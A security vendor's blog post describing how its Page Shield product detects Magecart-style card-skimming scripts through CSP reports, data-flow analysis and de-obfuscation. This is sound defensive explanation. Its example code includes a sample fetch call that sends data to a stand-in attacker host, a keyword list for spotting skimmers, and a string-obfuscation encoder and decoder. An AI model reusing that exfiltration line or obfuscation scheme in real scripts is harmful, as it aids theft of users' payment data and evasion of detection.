Detecting Magecart-Style attacks with Page Shield

During CIO Week we announced the general availability of our client-side security product, Page Shield. Page Shield protects websites’ end users from client-side attacks that target vulnerable JavaScript dependencies in order to run malicious code in the victim’s browser. One of the biggest client-side threats is the exfiltration of sensitive user data to an attacker-controlled domain (known as a Magecart-style attack). This kind of attack has impacted large organizations like British Airways and Ticketmaster, resulting in substantial GDPR fines in both cases. Today we are sharing details of how we detect these types of attacks and how we plan to develop the product.

How does a Magecart-style attack work?

Magecart-style attacks are generally quite simple, involving just two stages. First, an attacker finds a way to compromise one of the JavaScript files running on the victim’s website. The attacker then inserts malicious code which reads personally identifiable information (PII) being entered by the site’s users, and exfiltrates it to an attacker-controlled domain. This is illustrated in the diagram below.

A diagram showing the steps involved in a Magecart-style attack

Magecart-style attacks are of particular concern to online retailers with users entering credit card details on the checkout page. Forms for online banking are also high-value targets along with login pages and anywhere else where you enter personal details online.

Attackers have several routes for compromising a popular library and getting their malicious code running on an unsuspecting vendor’s website, including:

Compromising third-party providers
Compromising the website itself
Exploiting vulnerabilities

Frequently, the third-party providers themselves get compromised and attackers gain the ability to modify code that’s being distributed to a number of websites; this was the case with the Inbenta breach that compromised Ticketmaster. Alternatively, if attackers gain admin access to the site itself, they can modify one of the scripts being used and insert their malicious code, which happened in 2018 to British Airways. Libraries that have reached their end of life and are no longer maintained by their creators remain exposed to newly discovered vulnerabilities that will never be patched. Automated attacks have been seen compromising thousands of checkout pages in one go by taking advantage of this.

What can be done about it?

Application security providers and security teams are able to provide several defense mechanisms for site owners that include:

A diagram showing 6 different possible mitigation strategies

Content Security Policies: Page Shield uses a content security policy (CSP) deployed in report-only mode to collect information from the browser about the scripts running on an application. That allows us to provide basic visibility to application owners about the files that are running on their site.

Static Analysis: Downloading the script and performing automated analysis on the content using machine learning techniques or databases of handwritten signatures can identify malicious scripts that would otherwise go undetected.

Threat Feeds: Databases of malicious hostnames or URLs are effective at capturing malware we already know about and complement detection capabilities that are targeted at novel attacks.

Subresource Integrity Checks: Application owners can include a cryptographic hash of the files they are loading in the ‘integrity’ attribute of any script or link element. The browser then refuses to load a file whose content does not match the hash, which is effective at protecting against unexpected changes at the source by malicious third parties.

External Connection Checks: Extracting a list of external connections being made by each script and comparing these against blocklists and allowlists can help spot malicious exfiltration attempts to attacker-controlled domains.
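Two of the mechanisms above are simple enough to sketch. The following is a minimal illustration for Node.js, not a description of how Page Shield implements them: `sriHash` computes a value suitable for the ‘integrity’ attribute, and `unexpectedHosts` does a naive external connection check by pulling literal URLs out of a script and comparing their hostnames against an allowlist. The function names, the sample script, and the hostnames are all hypothetical, and a literal-URL scan like this would miss URLs that are assembled at runtime.

```javascript
const crypto = require("node:crypto");

// Subresource Integrity value for a file body: "<algorithm>-<base64 digest>".
function sriHash(content, algorithm = "sha384") {
  const digest = crypto
    .createHash(algorithm)
    .update(content, "utf8")
    .digest("base64");
  return `${algorithm}-${digest}`;
}

// Collect hostnames of absolute http(s) URLs that appear literally in the source.
function externalHosts(source) {
  const hosts = new Set();
  const urlPattern = /https?:\/\/[^\s"'`<>)]+/g;
  for (const match of source.matchAll(urlPattern)) {
    try {
      hosts.add(new URL(match[0]).hostname);
    } catch {
      // Ignore strings that look like URLs but do not parse.
    }
  }
  return [...hosts];
}

// Hostnames contacted by the script that are not on the allowlist.
function unexpectedHosts(source, allowlist) {
  return externalHosts(source).filter((host) => !allowlist.has(host));
}

// Hypothetical script body and allowlist, for illustration only.
const sampleScript =
  'fetch("https://evil.example/collect", { method: "POST", body: data });';
console.log(sriHash(sampleScript));
console.log(unexpectedHosts(sampleScript, new Set(["cdn.example.com"])));
```

The integrity value only helps when the file is expected to stay byte-for-byte identical, which is why it complements rather than replaces content-based detection.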

Page Shield currently leverages CSP reports, threat-intelligence feeds, and ML-based static analysis in order to detect malicious scripts. We think static analysis has an important role to play in the detection of client-side threats with the ability to detect attacks that are unlikely to be found with the other mechanisms.
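To make the CSP reporting mechanism concrete, here is a hedged sketch of the general technique rather than Page Shield’s actual configuration. It assumes a report-only policy whose `script-src` directive matches nothing, so that every script load produces a violation report without being blocked, and it assumes reports arrive in the legacy `report-uri` JSON format. The `/csp-report` endpoint and the `scriptFromReport` helper are hypothetical.

```javascript
// Response header that asks the browser to report script loads without blocking them.
// The policy value and the "/csp-report" endpoint are illustrative assumptions.
const reportOnlyHeader = {
  name: "Content-Security-Policy-Report-Only",
  value: "script-src 'none'; report-uri /csp-report",
};

// Extract the page and script URL from a legacy-format CSP violation report body.
// Returns null when the report is not about a script directive.
function scriptFromReport(body) {
  const report = JSON.parse(body)["csp-report"];
  if (!report) return null;
  const directive =
    report["effective-directive"] || report["violated-directive"] || "";
  if (!directive.startsWith("script-src")) return null;
  return { page: report["document-uri"], script: report["blocked-uri"] };
}

// Hypothetical report, shaped like what a browser would POST to the endpoint.
const sampleReport = JSON.stringify({
  "csp-report": {
    "document-uri": "https://shop.example/checkout",
    "blocked-uri": "https://cdn.example/lib.js",
    "effective-directive": "script-src-elem",
  },
});
console.log(reportOnlyHeader.name + ": " + reportOnlyHeader.value);
console.log(scriptFromReport(sampleReport));
```

Aggregating the `script` values per page gives the kind of inventory of running files that the CSP mechanism is used for here.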

Some ways we’re doing static analysis

Our static analysis system covers two scenarios:

The code is readable, and its functionality has not been obscured
The functionality of the code has been obscured (with or without malicious intent)

This gives four categories of script to analyze:

Benign scripts
Malicious scripts
Obfuscated or minified benign scripts
Obfuscated malicious scripts

We’ve developed separate models for the two scenarios mentioned above. The first is targeted at detecting ‘clean’ scripts, where the code has not been obscured. The second looks at obfuscated scripts and differentiates between malicious and benign content.

The detection of ‘clean’ malicious scripts relies on an analysis of the script’s data flow properties which are derived from a representation of the script called an abstract syntax tree. Consider the following very simple example script:

A very simple made-up Magecart-style attack

This script has an associated abstract syntax tree (AST), a graph-based representation of the structure of the program, and a key tool in static analysis of malware. The below diagram shows a sample of the AST from the above code snippet.

A diagram showing the abstract syntax tree for our simple example
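For readers who have not worked with ASTs, the sketch below shows what one looks like as data. It is a hand-written tree in the widely used ESTree shape for a single hypothetical statement, `const cc = document.getElementById("cc_number").value;`, which is assumed here as a stand-in for part of the example script. A real system would obtain the tree from a JavaScript parser; the `walk` helper is illustrative.

```javascript
// Hand-written ESTree-style AST for the hypothetical statement:
//   const cc = document.getElementById("cc_number").value;
const ast = {
  type: "Program",
  body: [{
    type: "VariableDeclaration",
    kind: "const",
    declarations: [{
      type: "VariableDeclarator",
      id: { type: "Identifier", name: "cc" },
      init: {
        type: "MemberExpression",
        computed: false,
        object: {
          type: "CallExpression",
          callee: {
            type: "MemberExpression",
            computed: false,
            object: { type: "Identifier", name: "document" },
            property: { type: "Identifier", name: "getElementById" },
          },
          arguments: [{ type: "Literal", value: "cc_number" }],
        },
        property: { type: "Identifier", name: "value" },
      },
    }],
  }],
};

// Depth-first walk that records each node's type, indented by nesting depth.
function walk(node, depth = 0, out = []) {
  if (Array.isArray(node)) {
    for (const child of node) walk(child, depth, out);
  } else if (node !== null && typeof node === "object") {
    let childDepth = depth;
    if (typeof node.type === "string") {
      out.push("  ".repeat(depth) + node.type);
      childDepth = depth + 1;
    }
    for (const value of Object.values(node)) walk(value, childDepth, out);
  }
  return out;
}

console.log(walk(ast).join("\n"));
```

The printed outline contains only node types and nesting, which is the structural view of a program that stays the same when variable names or string contents change.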

Page Shield uses a script’s AST to detect whether a significant change has occurred in the structure of the program (triggering a change alert), and also to derive the script’s corresponding data flow graph, which tracks the flow of data between variable assignments and function calls. The figure below shows the raw data flow graph derived from the AST for our simple example.

A diagram showing the data flow graph for our simple example

We have developed an ML model capable of identifying nodes on the graph that relate to PII reads or malicious data exfiltration, producing the per-node likelihoods shown on the graph below. The nodes in blue have been classified as related to PII and those in red as being related to data exfiltration:

A diagram showing node-predictions on the data flow graph for our simple example

A script can be classified as malicious if there’s a connected path on the graph between nodes involved in the reading of PII and nodes that form part of the data exfiltration call to an attacker-controlled domain:

A diagram showing the connected data flow path for our simple example
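The connected-path check itself is ordinary graph reachability. The sketch below is a toy version under stated assumptions: the data flow graph is written out by hand as a list of directed edges, and the sets of PII-read and exfiltration nodes are given directly, whereas in the approach described above they would come from the model’s node predictions. The node names and the `findFlowPath` function are hypothetical.

```javascript
// Breadth-first search from any source node to any sink node.
// Returns the first path found as an array of node names, or null if none exists.
function findFlowPath(edges, sources, sinks) {
  const next = new Map();
  for (const [from, to] of edges) {
    if (!next.has(from)) next.set(from, []);
    next.get(from).push(to);
  }
  const parent = new Map();
  const queue = [];
  for (const source of sources) {
    parent.set(source, null);
    queue.push(source);
  }
  while (queue.length > 0) {
    const node = queue.shift();
    if (sinks.has(node)) {
      const path = [];
      for (let cur = node; cur !== null; cur = parent.get(cur)) path.unshift(cur);
      return path;
    }
    for (const neighbor of next.get(node) || []) {
      if (!parent.has(neighbor)) {
        parent.set(neighbor, node);
        queue.push(neighbor);
      }
    }
  }
  return null;
}

// Hypothetical data flow graph: each pair means "data flows from -> to".
const flowEdges = [
  ["getElementById('cc_number')", "ccField"],
  ["ccField", "ccField.value"],
  ["ccField.value", "payload"],
  ["payload", "JSON.stringify(payload)"],
  ["JSON.stringify(payload)", "fetch(...)"],
  ["window.innerWidth", "layoutWidth"], // unrelated logic, not connected to the sink
];
const piiReads = new Set(["getElementById('cc_number')"]);
const exfilCalls = new Set(["fetch(...)"]);

console.log(findFlowPath(flowEdges, piiReads, exfilCalls));
console.log(findFlowPath(flowEdges, new Set(["window.innerWidth"]), exfilCalls));
```

In this toy graph the first call finds a path from the PII read to the network call, while the second returns null because the layout code never feeds the request.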

Models agnostic to the connection between the PII-read and exfiltration call are prone to false positives in scenarios where they are unrelated. Our data-flow based approach allows us to effectively detect attacks while eliminating false positives from disconnected logic.

Malicious actors, however, are usually trying to evade detection, and in order to avoid being spotted will often conceal their attack by encoding and transforming the content beyond recognition. Our second model handles this type of content and is able to differentiate between benign and malicious use of obfuscation.

The below example shows an attack that's been obscured via the inclusion of hex-encoded strings in a list _0xb902 which is subsequently referenced.

An example of an obfuscated Magecart-style attack

Normalizing the content by decoding hex digits on hex-matching substrings reveals a number of JavaScript keywords used as part of the attack.

An example of an obfuscated Magecart-style attack after normalization

The concept of ‘revealed risk’ (how risky the revealed content is) forms the core of our approach for differentiating between obfuscated malware and legitimate uses of character encoding or minification. For example, revealing keywords like “cc_number” and “stringify” in the above example provides a strong signal that this is an attack.
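A minimal sketch of this idea follows. It assumes the hex-encoded strings use JavaScript’s `\xHH` escape form and that a small, hand-picked keyword list stands in for a real risk model; `normalizeHex`, `revealedKeywords`, and the keyword list are hypothetical, and the obfuscated sample is made up for illustration.

```javascript
// Hypothetical list of keywords treated as risky once revealed.
const RISKY_KEYWORDS = ["cc_number", "stringify", "getElementById"];

// Decode \xHH escape sequences that appear literally in the source text.
function normalizeHex(source) {
  return source.replace(/\\x([0-9a-fA-F]{2})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex, 16))
  );
}

// Keywords that are absent from the raw source but present after normalization.
function revealedKeywords(source) {
  const normalized = normalizeHex(source);
  return RISKY_KEYWORDS.filter(
    (keyword) => normalized.includes(keyword) && !source.includes(keyword)
  );
}

// Made-up obfuscated snippet; String.raw keeps the backslashes as literal text.
const obfuscated = String.raw`var _0xb902 = ["\x63\x63\x5f\x6e\x75\x6d\x62\x65\x72", "\x73\x74\x72\x69\x6e\x67\x69\x66\x79"];`;

console.log(normalizeHex(obfuscated));
console.log(revealedKeywords(obfuscated));
```

Counting only keywords that were hidden before normalization is what separates revealed risk from plain keyword matching: a readable script that mentions `stringify` openly reveals nothing new.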

However, analyzing the revealed risk only works if you can normalize the content. Frequently attackers go far beyond simple character encoding schemes to hide their malicious code. It is common to see custom-defined obfuscation functions in malicious scripts that can apply any arbitrary series of transformations to the input string. For example, consider a potential encoding function:

An example of a function doing arbitrary string encoding

This transforms the string document.getElementById to 646u63756s656t742t676574456r656s656t7442794964.

The decoding function defined in the script would be:
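A minimal sketch of such an encoder and its matching decoder is given here. It is a hypothetical reconstruction, not the script’s actual code: it assumes the scheme hex-encodes each character and then shifts the hex letters a to f forward by 15 positions in the alphabet (so a to f become p to u), which is an assumption chosen because it reproduces the example string above. The names `encode`, `decode`, and `SHIFT` are illustrative, and the sketch only handles ASCII input.

```javascript
// Assumed offset: maps the hex letters a-f onto p-u, matching the example output.
const SHIFT = 15;

// Hex-encode each character, then disguise the hex letters by shifting them.
function encode(text) {
  let hex = "";
  for (let i = 0; i < text.length; i++) {
    hex += text.charCodeAt(i).toString(16).padStart(2, "0");
  }
  return hex.replace(/[a-f]/g, (ch) =>
    String.fromCharCode(ch.charCodeAt(0) + SHIFT)
  );
}

// Undo the letter shift, then turn each pair of hex digits back into a character.
function decode(encoded) {
  const hex = encoded.replace(/[p-u]/g, (ch) =>
    String.fromCharCode(ch.charCodeAt(0) - SHIFT)
  );
  let text = "";
  for (let i = 0; i < hex.length; i += 2) {
    text += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16));
  }
  return text;
}

console.log(encode("document.getElementById"));
console.log(decode("646u63756s656t742t676574456r656s656t7442794964"));
```

Because the shifted letters are no longer valid hex digits, a normalizer that only decodes hex has nothing to latch onto unless it also knows the offset, which is what makes schemes like this a bypass for purely static decoding.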

Normalizing strings that have been through complex transformations requires execution of the code, and so in order to avoid a trivial bypass with an encoding scheme such as the above, our model also detects the presence of malicious, encoded strings that cannot be normalized.

With our approach of analyzing clean and obfuscated content separately, looking for connected paths on the data flow graph, revealed risk or arbitrary string transformations, we’ve been able to detect most attacks that we’ve seen to date. We’re excited to see what we find as we onboard more customers onto Page Shield and will continue to evolve our detection capabilities over time.

What’s next?

We're constantly improving on our models and will be expanding content-based risk-scoring to include other attack types like crypto-mining and adware over the coming months. Enterprise customers can sign up for Page Shield’s enterprise add-on which includes content-based detection of Magecart-style attacks within your sites’ JavaScript dependencies.
